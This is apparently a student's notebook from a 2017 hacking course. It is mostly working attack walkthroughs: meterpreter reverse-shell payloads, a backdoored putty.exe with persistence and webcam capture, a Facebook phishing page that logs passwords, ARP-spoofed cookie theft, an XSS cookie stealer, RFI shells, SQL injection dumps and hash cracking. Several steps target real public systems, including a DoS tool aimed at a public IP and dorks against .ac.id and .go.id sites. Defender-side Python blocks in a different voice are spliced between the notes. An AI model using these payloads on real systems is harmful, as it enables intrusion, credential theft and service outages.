
XCode

Notebook: nbctcp's notebook
Created: 12-Jan-17 10:20 PM Updated: 29-Jan-17 5:26 AM
Author: Nbctcp Bo
Tags: Hack
URL: http://xcode.or.id/professional/

-to learn hacking, search in Google "DVWA"


Damn Vulnerable Web App

-to brute-force Facebook using a dictionary, you need the FireForce plugin in Firefox

-to retrieve browser password


https://github.com/AlessandroZ/LaZagne

CMD> tasklist
CMD> taskkill

-google search whatsapp meterpreter


-Cloudflare, a service for preventing DDoS
-encode/decode is different from encrypt/decrypt

QUESTIONS:
-virtualbox remote display multiple connection
-adding new metasploit module

-installing kali on ubuntu


-putty using tor network

LAB 3-1 WIN10 Mon 23/1


-search for holes
# nmap -sS -sV -O 192.168.1.159
PORT STATE SERVICE VERSION
21/tcp open ftp Easy File Sharing ftpd
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
990/tcp open ssl/ftp Easy File Sharing ftpd
MAC Address: 08:00:27:7B:C1:87 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 build 10074 - 10586
Network Distance: 1 hop
Service Info: Host: DESKTOP-CD3JGJF; OS: Windows; CPE: cpe:/o:microsoft:windows

search exploit-db for an Easy File Sharing ftpd hole


VM: WIN10.vdi
STATUS:
https://www.exploit-db.com/exploits/33538/
# wget https://www.exploit-db.com/download/33538
# vi 33538
change the IP address here to your target IP, which is 192.168.1.159
s.connect(("192.168.1.159", 21))
:wq!
-because 33538 only runs the calculator, we need to replace its payload with the payload from https://www.exploit-db.com/exploits/20876/
# wget https://www.exploit-db.com/download/20876
# vi 20876
copy this part

# pico 33538
delete this part

and replace with 20876 PAYLOAD



NOTE:
-Kali Linux 2u2 cannot run in VirtualBox because it will error
-Vista and 2008 must run in VMware when attacked with MS09-050; in VirtualBox they blue screen (tested wrong)
-in Metasploit, the difference between shell and meterpreter is that shell only gives DOS commands, while meterpreter can upload, download, run the webcam, etc.

p390 Exploit development


STATUS:
VM: WINXP
-on WINXP
run D:\dataa\freefloatftpserver-list bof\Win32\FTPServer
-from kali
# nmap -A 192.168.1.106
we find an FTP server running
-close ftp server
-on XP run Immunity Debugger
open D:\dataa\freefloatftpserver-list bof\Win32\FTPServer

-create fuzzer.py
#!/usr/bin/env python3
# Sends a 200-byte USER name to the FTP server to see whether the service crashes.
import socket

ipaddress = "192.168.1.106"
paket = 200                          # size of the test buffer
commanduserftp = "\x41" * paket      # 200 x "A"
commandpassftp = "anonymous"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ipaddress, 21))
print(s.recv(1024))                  # server banner
s.send(("USER " + commanduserftp + "\r\n").encode())
print(s.recv(1024))
s.send(("PASS " + commandpassftp + "\r\n").encode())
s.close()

...
...

# locate pattern_create.rb
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 1000
or in Kali2 use
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae

copy above and paste into


follow p400
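
As an added defender-side example (not from the notebook or the course book), the Python below scans constructed FTP control-channel log lines for the two inputs this lab sends, a 200-byte run of "A" from fuzzer.py and the pattern_create.rb output, and reports them. The log line format and the 64-byte length threshold are assumptions.

```python
import re

# Constructed FTP log lines; format assumed: "<date> <time> <client-ip> <command> <argument>".
CYCLIC = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"
          "Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9")
SAMPLE_LOG = "\n".join([
    "2017-01-25 10:01:02 192.168.1.110 USER alice",
    "2017-01-25 10:01:03 192.168.1.110 PASS hunter2",
    "2017-01-25 10:04:17 192.168.1.105 USER " + "A" * 200,   # fuzzer.py's buffer
    "2017-01-25 10:04:18 192.168.1.105 PASS anonymous",
    "2017-01-25 10:06:40 192.168.1.105 USER " + CYCLIC,      # pattern_create.rb output
])

MAX_ARG_LEN = 64   # assumed threshold; legitimate user names are far shorter
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<ip>\S+) (?P<cmd>[A-Z]{3,4})(?: (?P<arg>.*))?$")
# pattern_create.rb emits runs of "<Upper><lower><digit>" triplets; eight in a row is no name.
CYCLIC_RE = re.compile(r"(?:[A-Z][a-z][0-9]){8,}")


def classify(cmd, arg):
    """Return the reasons an FTP command argument looks like buffer-overflow fuzzing."""
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append(f"oversized {cmd} argument ({len(arg)} bytes)")
    if len(arg) >= 16 and len(set(arg)) == 1:
        reasons.append(f"{cmd} argument is one repeated byte {arg[0]!r}")
    if CYCLIC_RE.search(arg):
        reasons.append(f"{cmd} argument contains a Metasploit-style cyclic pattern")
    return reasons


def scan(log_text):
    """Return (client_ip, command, reasons) for every suspicious command in the log."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # not a command line in the assumed format
        reasons = classify(m["cmd"], m["arg"] or "")
        if reasons:
            findings.append((m["ip"], m["cmd"], reasons))
    return findings


if __name__ == "__main__":
    for ip, cmd, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {cmd}: " + "; ".join(reasons))
```

The argument itself is never printed, so PASS values stay out of the alert text.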

25/1
NOTE:
turn off DeepFreeze in XP vm by typing Ctrl+Alt+Shift+F6, then click Boot Thawed. Password pentium2

p500 DOS
STATUS:
VM:

p522 Capture ftp password


STATUS: OK
VM: KALI XP XPSP2

p534 Fake Facebook


STATUS: IN PROGRESS
VM: KALI XPSP3
In KALI:
-add "*.com A 192.168.1.103" into /etc/ettercap/etter.dns
# nano /etc/ettercap/etter.dns
*.com A 192.168.1.103
-run ettercap
# ettercap -G
click menu Hosts/Scan for hosts
click Hosts/Hosts list
click 192.168.1.1, click Add to Target 1
click 192.168.1.110, click Add to Target 2
NOTE: 192.168.1.1 Gateway
192.168.1.110 Client
-put fbrun.php into /var/www/html/
# cat /var/www/html/fbrun.php
<?php $file = "facebook.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++ ++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++ ++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!--
window.location=\"https://login.facebook.com/login.php?login_attempt=1\";
// -->
</script>";
?>
-create facebook login page
open facebook.com in Firefox and Save Page and choose "Web Page, HTML only" and save as index.html
open index.html using leafpad
search for "action=" then find
https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110
replace with
fbrun.php then save
put index.html into your kali webserver
# mv /root/index.html /var/www/html/
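
As an added defender-side check (not part of the notebook), this Python parses a saved login page and flags any form with a password field whose action does not resolve to the origin the page claims to come from, which is exactly the edit made above (the Facebook action replaced by fbrun.php). The HTML samples and the hosting URL are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed clone of a login page as it would be served from the Kali web root.
CLONED_PAGE_URL = "http://192.168.1.103/index.html"
CLONED_HTML = """
<html><body>
<form id="login_form" action="fbrun.php" method="post">
  <input name="email"><input name="pass" type="password">
</form>
</body></html>
"""
# Constructed genuine form, with the action string seen in the saved page.
GENUINE_HTML = """
<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110" method="post">
  <input name="email"><input name="pass" type="password">
</form>
"""
EXPECTED_ORIGIN = "https://www.facebook.com"   # where the credentials should go


class FormCollector(HTMLParser):
    """Collect id, action and whether a password field exists for every <form>."""
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)   # HTMLParser already unescapes &amp; in attribute values
        if tag == "form":
            self._current = {"id": a.get("id", ""), "action": a.get("action", ""), "password": False}
        elif tag == "input" and self._current is not None and a.get("type") == "password":
            self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def origin(url):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def audit_forms(html, page_url, expected_origin=EXPECTED_ORIGIN):
    """Return (form id, resolved action, problem) for each credential form posting elsewhere."""
    parser = FormCollector()
    parser.feed(html)
    problems = []
    for form in parser.forms:
        if not form["password"]:
            continue                                   # only care where passwords go
        target = urljoin(page_url, form["action"])     # a relative action resolves to the host
        if origin(target) != expected_origin:
            problems.append((form["id"], target, f"posts to {origin(target)}, expected {expected_origin}"))
        elif not target.startswith("https://"):
            problems.append((form["id"], target, "password submitted over cleartext HTTP"))
    return problems
```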

p541 SSLStrip
STATUS:
VM: KALI

p586 HeartBleed
STATUS: OK -> needs a lot of login activity so that we can capture the password
VM: KALI UBUNTU13.04.vdi

p593 Cookie
STATUS: OK
VM: WIN7 XPSP2 XP
WIN7=hacker, XPSP2=web server, XP=target

-in XPSP2, WordPress starts automatically; you can verify it by opening http://localhost/blog/wordpress/
-in WIN7 make sure have FireFox ESR with GreaseMonkey plugin
after enable GreaseMonkey plugin install http://userscripts-mirror.org/scripts/show/119798
install Cain&Abel
install Wireshark and, in VirtualBox, set the NIC's Promiscuous Mode to "Allow All"
-to change WordPress ip in XPSP2
go to http://localhost/phpmyadmin
L: root
P:
click WordPress on the left bar
click wp_options
click Browse
click Edit on siteurl
change ip there
click on Save\Go
-server WordPress running in XPSP2

-hacker WIN7
run cainabel
click Sniffer
click Host at the bottom
right click/Scan MAC Addresses
click bottom APR
click activate top APR
click top right box
click top +
on the left click the user IP, i.e. 192.168.1.109
on the right click the WordPress server IP, i.e. 192.168.1.111

make sure the NIC and ARP icons at the top are on


run WireShark
double-click Local Area Connection
in filter type http.cookie
-user in XP
run any browser
go to http://localhost/blog/wordpress/wp-login.php
L: admin
P: baseball
-hacker in WIN7
copy selected cookie like this

open FireFox with GreaseMonkey


go to
press Alt-c and paste cookie
click OK
click refresh
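
The capture above works because the WordPress session cookie travels in cleartext and carries no protective attributes. As an added example (not from the notebook), this Python audits the Set-Cookie headers of a constructed login response and shows the hardened form of a cookie; cookie names and values are made up.

```python
# Constructed response headers, modelled on a WordPress login over plain HTTP.
SAMPLE_RESPONSE = """\
HTTP/1.1 302 Found
Set-Cookie: wordpress_logged_in_deadbeef=admin%7C1485400000%7Cabcdef; path=/blog/wordpress/; httponly
Set-Cookie: wordpress_sec_deadbeef=admin%7C1485400000%7C123456; path=/blog/wordpress/wp-admin; secure; httponly
Set-Cookie: wp-settings-1=editor%3Dhtml; expires=Thu, 25-Jan-2018 10:00:00 GMT; path=/
Location: http://192.168.1.111/blog/wordpress/wp-admin/
"""


def parse_set_cookie(value):
    """Split 'name=value; attr; attr=value' into (name, value, {attr: value or True})."""
    parts = [p.strip() for p in value.split(";")]
    name, _, val = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip() if v else True
    return name.strip(), val, attrs


def audit_cookies(response_text, scheme):
    """Return {cookie name: [problems]} for cookies that can be sniffed or stolen."""
    report = {}
    for line in response_text.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        name, _, attrs = parse_set_cookie(line.split(":", 1)[1])
        problems = []
        if scheme == "http":
            problems.append("set over cleartext HTTP; visible to the http.cookie filter")
        if "secure" not in attrs:
            problems.append("missing Secure: browser will resend it over HTTP")
        if "httponly" not in attrs:
            problems.append("missing HttpOnly: readable via document.cookie")
        if "samesite" not in attrs:
            problems.append("missing SameSite")
        if problems:
            report[name] = problems
    return report


def harden(header_value):
    """Rewrite a Set-Cookie value with the attributes a session cookie should carry."""
    name, val, attrs = parse_set_cookie(header_value)
    attrs.update({"secure": True, "httponly": True, "samesite": "Lax"})
    rendered = [f"{name}={val}"]
    for k, v in attrs.items():
        rendered.append(k if v is True else f"{k}={v}")
    return "; ".join(rendered)
```

Secure alone is not enough: the site must also be served over HTTPS, otherwise the browser never sends the cookie and the login breaks.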

p604-611
STATUS:
VM: KALI XPSP3
Client side attack

p616 Adobe Acrobat attack


STATUS:
VM: KALI XPSP3

p624-631 Brute force


STATUS:
VM: KALI2

p712 John the Ripper and pwdump7


STATUS:
VM: KALI WIN7 (JtR is built into Kali; pwdump needs to be installed)

p719 MSFVENOM WIN7


STATUS: OK
VM: KALI WIN7
-in KALI
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 -f exe > WIN7.exe
copy WIN7.exe to target WIN7
# msfconsole
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.1.105
> set lport 4444
> run
-in WIN7
run WIN7.exe
-in KALI
meterpreter > getuid
Server username: windows7-PC\windows7
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > search ms16_016
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/local/ms16_016_webdav 2016-02-09 excellent MS16-016 mrxdav.sys WebDav Local Privilege Escalation
msf exploit(handler) > use exploit/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms16_016_webdav) > set lhost 192.168.1.105
lhost => 192.168.1.105
msf exploit(ms16_016_webdav) > set lport 4444
lport => 4444
msf exploit(ms16_016_webdav) > set session 1
session => 1
msf exploit(ms16_016_webdav) > run
[*] Started reverse TCP handler on 192.168.1.105:4444
[*] Launching notepad to host the exploit...
[+] Process 2164 launched.
[*] Reflectively injecting the exploit DLL into 2164...
[*] Exploit injected ... injecting payload into 2164...
[*] Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
> run
> getuid
Server username: NT AUTHORITY\SYSTEM

p722 MSFVENOM WIN8.1


STATUS: OK
VM: KALI WIN8.1
-in KALI
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 -f exe > WIN81.exe
upload WIN81.exe to target WIN81 vm
# msfconsole
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.1.104
> set lport 4444
> run
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 192.168.1.129
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.129:49426) at 2017-01-26 20:07:32 -0500
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > search ms15 -078
manual MS15-078 Microsoft Windows Font Driver Buffer Overflow
exploit/windows/local/ntapphelpcachecontrol 2014-09-30
> use exploit/windows/local/ntapphelpcachecontrol
> set session 1
> set lhost 192.168.1.104
> set lport 4444
> run
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] Uploading the payload DLL
[*] Payload DLL will be: C:\Users\data\AppData\Local\Temp\foZZEu.dll
[*] Injecting exploit into PID 5968
[*] Creating thread
[*] Sending stage (957487 bytes) to 192.168.1.129
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.129:49427) at 2017-01-26 20:09:38 -0500
meterpreter > getuid
Server username: pcwindows\data
> getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
> getuid
Server username: NT AUTHORITY\SYSTEM
> sysinfo
Computer : PCWINDOWS
OS : Windows 8.1 (Build 9600).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
> pwd
C:\Windows\system32
> shell
Process 2216 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
>net user nawir Baseball12 /add
net user nawir Baseball12 /add
The command completed successfully.
>net localgroup administrators nawir /add
net localgroup administrators nawir /add
The command completed successfully.
> exit
> run vnc

p725 Hercules (remote exploit to bypass WIN10 MS Defender. Can be detected by TrendMicro)
STATUS:
VM: KALI WIN10
# cd /opt
# git clone https://github.com/EgeBalci/HERCULES
-in mIRC, to check who in channel Yogyakarta has an IP starting with 180
/who #yogyakarta *!*@125.*
now

p506 Yersinia
STATUS:
VM: KALI WIN7

p730 Backdoor using kali


STATUS: OK
VM: KALI2 WIN7
WEAKNESS: the camera light will turn on
download putty.exe
# msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 1 -k -x /root/putty.exe LHOST=192.168.1.103 LPORT=4444 > puttycam.exe
send puttycam.exe to target
run the listener
# msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.103
set lport 4444
run
-in WIN7 target
open puttycam.exe
-in KALI
after connected do
> ps aux
find the PID of explorer.exe, for example 2540
> migrate 2540
> run persistence -U -i 5 -p 4444 -r 192.168.1.103
NOTE: the persistence above still has a problem when the target reboots
> run webcam
to capture a snapshot
> webcam_snap

p731 Android backdoor


VM: KALI2.1 WIN7
STATUS: need to be tested
the instructor forgot which files are needed to make it run

p755 MySQL Basic


STATUS:
VM:

p784 Google Hacking


STATUS:
VM:
intext:password of: site:ac.id filetype:pdf
of: means folder
to search robots.txt files
intext:"admin|login" inurl:robots.txt site:go.id

p788 DIRBUSTER
Wordlist.txt here means: find the filenames listed inside wordlist.txt

p824 XSS
STATUS: OK
VM: WINXPSP2
-in WINXPSP2
-Webserver in WINXPSP2 running automatically on startup
open web browser
go to http://192.168.1.32/blogphp
test xss injection
http://192.168.1.32/blogphp/index.php?search=%22%3E%3C/title%3E%3Cmarquee%20bgcolor=%22red%22%3E%3CH2%3EKurniawan%20ganteng%3C/H2%3E%3C/marquee%3E
result

http://192.168.1.32/blogphp/index.php?search=%22%3E%3C/TITLE%3E%3CIFRAME%20src=http://xcode.or.id%3E%3CIFRAME%3E
result
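
As an added example (not from the notebook), the Python below takes the search parameter from the two test URLs above, renders it the way the vulnerable page appears to (raw, inside the title and an input value) and beside it the hardened way (HTML-escaped), and lists the tags each payload managed to inject. The template is an assumption about blogphp's markup.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# The two test URLs from the lab, each joined back onto one line.
URL_MARQUEE = ("http://192.168.1.32/blogphp/index.php?search=%22%3E%3C/title%3E%3Cmarquee%20"
               "bgcolor=%22red%22%3E%3CH2%3EKurniawan%20ganteng%3C/H2%3E%3C/marquee%3E")
URL_IFRAME = ("http://192.168.1.32/blogphp/index.php?search=%22%3E%3C/TITLE%3E%3CIFRAME%20"
              "src=http://xcode.or.id%3E%3CIFRAME%3E")

# Assumed shape of the page: the search term is echoed in the title and as an attribute value.
TEMPLATE = '<title>Search: {q}</title><input name="search" value="{q}">'
TAG_RE = re.compile(r"</?([A-Za-z][A-Za-z0-9]*)")


def search_param(url):
    """Decode the search= query parameter as the server would see it."""
    return parse_qs(urlsplit(url).query).get("search", [""])[0]


def render_vulnerable(q):
    return TEMPLATE.format(q=q)                           # raw reflection, as the lab shows


def render_hardened(q):
    return TEMPLATE.format(q=html.escape(q, quote=True))  # < > & " ' become entities


def injected_tags(rendered):
    """Tag names present in the output that the template itself never emits."""
    expected = {t.lower() for t in TAG_RE.findall(TEMPLATE)}
    return sorted({t.lower() for t in TAG_RE.findall(rendered)} - expected)
```

The same escaping has to be applied per context; a value placed inside a script block or a URL attribute needs a different encoder than html.escape.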

p825 Wapiti
STATUS:
VM: KALI XPSP2
-in KALI
# wapiti http://192.168.1.111/wcms

p829 XSS Persistent

p830 Ultra Light forum


STATUS: Not working in KALI2.2 because the owner of log.txt is www-data, not root; needs testing with KALI2.0
VM: KALI XPSP2
-in KALI
put scriptcookie.php into /var/www/html
# chmod
go to http://192.168.111/forum
click Want to start
click Create Topic

To test whether this Message box is XSS vulnerable, we need to test it using a script
click Settings

click Profile
back to Settings to apply real script
paste below script
script>document.write('<img src="http://192.168.1.105/scriptcokie.php?cookie=' + document.cookie + '" />')</script>
click Update
click Profile

p834 Tamper Data firefox extension


STATUS: IN PROGRESS
VM: XPSP2
put uploadaja into apache html folder

-in KALI
open FireFox and install Tamper Data plugin
open

p853 LFI
STATUS:
VM: XPSP2
-in XPSP2
open firefox
go to http://localhost/blog/wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2fwp-config.php

p857 RFI
STATUS:
VM: KALI XPSP2
-in XPSP2
verify WordPress is running by going to http://192.168.1.111/blog/wordpress/
-in KALI
copy shell.txt into /var/www/html
# wpscan http://192.168.1.111/blog/wordpress/
open firefox and go to
http://192.168.1.111/blog/wordpress/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=http://192.168.1.108/shell.txt?

# wapiti http://192.168.1.32/sinaraccounting
Remote inclusion vulnerability in http://192.168.1.32/sinaraccounting/index.php via injection in the parameter accounting
Evil url: http://192.168.1.32/sinaraccounting/index.php?accounting=http%3A%2F%2Fwww.google.fr%2F%3F
open browser go to
http://192.168.1.32/sinaraccounting/index.php?accounting=http://192.168.1.108/shell.txt?
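
The LFI and RFI requests above both exploit an include/download parameter that accepts either a traversal path or a remote URL. As an added example (not from the notebook, WordPress or sinaraccounting), this Python shows the check such a script should apply: decode, refuse URL schemes, normalise, and confirm the result stays under the allowed directory. The root directory and the legitimate input are assumptions.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Assumed directory the download script is allowed to serve files from.
DOWNLOAD_ROOT = "/var/www/html/blog/wordpress/wp-content/uploads"

# Inputs taken from the lab plus one constructed legitimate request.
LFI_INPUT = "..%2f..%2f..%2fwp-config.php"
RFI_INPUT = "http://192.168.1.108/shell.txt?"
RFI_INPUT_ENCODED = "http%3A%2F%2Fwww.google.fr%2F%3F"
OK_INPUT = "2017/01/report.pdf"


def check_include(value, root=DOWNLOAD_ROOT):
    """Return (allowed, resolved path or reason) for a user-supplied file parameter."""
    decoded = unquote(unquote(value))             # peel double encoding such as %252f
    if "\x00" in decoded:
        return False, "NUL byte in path"
    if urlsplit(decoded).scheme or decoded.startswith("//"):
        return False, "remote URL or wrapper scheme is not a local file"   # RFI
    if decoded.startswith("/") or "\\" in decoded:
        return False, "absolute or backslash path rejected"
    resolved = posixpath.normpath(posixpath.join(root, decoded))
    if not resolved.startswith(root + "/"):       # normpath collapsed ../ above the root
        return False, f"path traversal escapes {root}"
    return True, resolved
```

On the XP/XAMPP target the same check must also treat backslashes and drive letters as separators, which is why they are rejected outright here.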
LAB Extra
STATUS: OK
VM: KALI WINXPSP2
-in KALI
# wapiti http://192.168.1.32/data
Referer: http://192.168.1.32/data/view.php?postid=1
Content-Type: application/x-www-form-urlencoded
nama=default&email=default&website=default&komentar=%3Cscript%3Ealert%28%27wapkdv40pk%27%29%3C%2Fscript%3E&id=1&kirim=Kirim%21
[+] Launching module blindsql
Blind SQL vulnerability in http://192.168.1.32/data/login.php via injection in the query string
Evil url: http://192.168.1.32/data/login.php?%22%20or%20sleep%287%29%3D%22
Blind SQL vulnerability in http://192.168.1.32/data/insert.mhs.php via injection in the query string
Evil url: http://192.168.1.32/data/insert.mhs.php?sleep%287%29%231

-in WINXPSP2
run Havij
click Tables
click Get Tables
check tbl_user
click Get Column

tick column username and password


click Get Data
copy hash password
click MD5
paste into MD5 hash
click Start
result on md5decryption.com -> 12345
click Find Admin

open browser
go to http://localhost/data/user.php
L: admin
P: 12345

p894 SQLMAP
STATUS:
VM: KALI WINXPSP2
# sqlmap -u http://192.168.1.111/data/view.php?postid=1 -D admin_mhs --tables
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[07:39:45] [INFO] GET parameter 'postid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'postid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
[07:40:34] [INFO] fetching tables for database: 'admin_mhs'
Database: admin_mhs
[7 tables]
+---------------------+
| tbl_artikel |
| tbl_cln_mahasiswa |
| tbl_komentar |
| tbl_mhsiswa |
| tbl_nilai_mahasiswa |
| tbl_user |
| tbl_user_profile |
+---------------------+
[07:40:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.111'

# sqlmap -u http://192.168.1.111/data/view.php?postid=1 -D admin_mhs -T tbl_artikel --column


Database: admin_mhs
Table: tbl_artikel
[6 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| id_artikel | int(5) |
| isi_berita | text |
| judul_berita | varchar(200) |
| penulis | varchar(50) |
| status | varchar(20) |
| tanggal_publish | date |
+-----------------+--------------+

# sqlmap -u http://192.168.1.111/data/view.php?postid=1 -D admin_mhs -T tbl_artikel --dump


Database: admin_mhs
Table: tbl_artikel
[1 entry]
+------------+---------+---------+----------------------+--------------+-----------------+
| id_artikel | status | penulis | isi_berita | judul_berita | tanggal_publish |
+------------+---------+---------+----------------------+--------------+-----------------+
|1 | publish | admin | Seminar Nasional\r\n | Pengumuman | 2010-10-19 |
+------------+---------+---------+----------------------+--------------+-----------------+

# sqlmap -u http://192.168.1.111/data/view.php?postid=1 -D admin_mhs -T tbl_user --dump


do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: admin_mhs
Table: tbl_user
[1 entry]
+---------+---------+----------+----------------------------------+
| id_user | level | username | password |
+---------+---------+----------+----------------------------------+
|1 |2 | admin | 827ccb0eea8a706c4c34a16891f84e7b |
+---------+---------+----------+----------------------------------+
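
view.php puts postid straight into the SQL text, which is why sqlmap's UNION test succeeded. As an added example (not from the notebook or the target application), this Python rebuilds a miniature of the admin_mhs schema in an in-memory SQLite database with constructed rows and contrasts the concatenated query with a parameterised one plus input validation.

```python
import sqlite3


def make_db():
    """Constructed miniature of the lab's admin_mhs database: one published and one draft post."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tbl_artikel (id_artikel INTEGER, judul_berita TEXT, status TEXT);
        INSERT INTO tbl_artikel VALUES (1, 'Pengumuman', 'publish');
        INSERT INTO tbl_artikel VALUES (2, 'Draft rapat', 'draft');
    """)
    return db


def view_post_vulnerable(db, postid):
    """What the lab's view.php effectively does: the raw parameter lands in the SQL text."""
    sql = f"SELECT id_artikel, judul_berita FROM tbl_artikel WHERE id_artikel = {postid}"
    return db.execute(sql).fetchall()


def view_post_hardened(db, postid):
    """Validate the type, then bind the value so it can never become SQL."""
    if not isinstance(postid, str) or not postid.isdigit():
        raise ValueError("postid must be a decimal integer")
    sql = "SELECT id_artikel, judul_berita FROM tbl_artikel WHERE id_artikel = ?"
    return db.execute(sql, (int(postid),)).fetchall()


def safe_lookup(db, postid):
    """Wrapper a request handler would use: invalid ids yield no rows instead of an exception."""
    try:
        return view_post_hardened(db, postid)
    except ValueError:
        return []


def is_suspicious_postid(value):
    """Cheap access-log check: anything but digits in a numeric id is worth an alert."""
    return not value.isdigit()
```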

check whether 827ccb0eea8a706c4c34a16891f84e7b is md5 or


# hash-identifier
HASH: 827ccb0eea8a706c4c34a16891f84e7b
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
-crack the MD5 password hash
# findmyhash MD5 -h 827ccb0eea8a706c4c34a16891f84e7b
***** HASH CRACKED!! *****
The original string is: 12345
You can also crack MD5 online or using

p916 phpMyAdmin attack


STATUS:
NOTES: Attacker WINXPSP2, target UBUNTU10.10
Can only test a normal user shell, not root; maybe we can use Dirty COW
need to
VM: UBUNTU10.10 WINXPSP2
-in UBUNTU10.10
run lampp
# /opt/lampp/lampp start
open browser and go to
http://192.168.1.108/sinaraccounting/

-in WINXPSP2
copy r57.php into E:\xampp\htdocs
install wapiti for windows
> wapiti http://192.168.1.108/sinaraccounting
[+] Launching module file
Remote inclusion vulnerability in http://192.168.1.111/sinaraccounting/index.php via injection in the parameter accounting
Evil url: http://192.168.1.111/sinaraccounting/index.php?accounting=http%3A%2F%2Fwww.google.fr%2F%3F

p956 Antiloris
STATUS:
VM: UBUNTU13.04

p957 SSH Honeypot


STATUS:
VM:

p962 ARPON
STATUS:
VM:

p985 Port Knocking

-software to bypass the login password on Mac and Windows is Kon-Boot


http://www.piotrbania.com/all/kon-boot/

-vadim is software that attacks a target server's service until it goes down


NOTE: check from a different network whether the target is still up
to compile vadim
# gcc vadimI.c -o vadim
to attack any server port
# ./vadimI 202.160.14.18 80 0
NOTE:
0 above means unlimited
For Kali1, click No; later we will edit
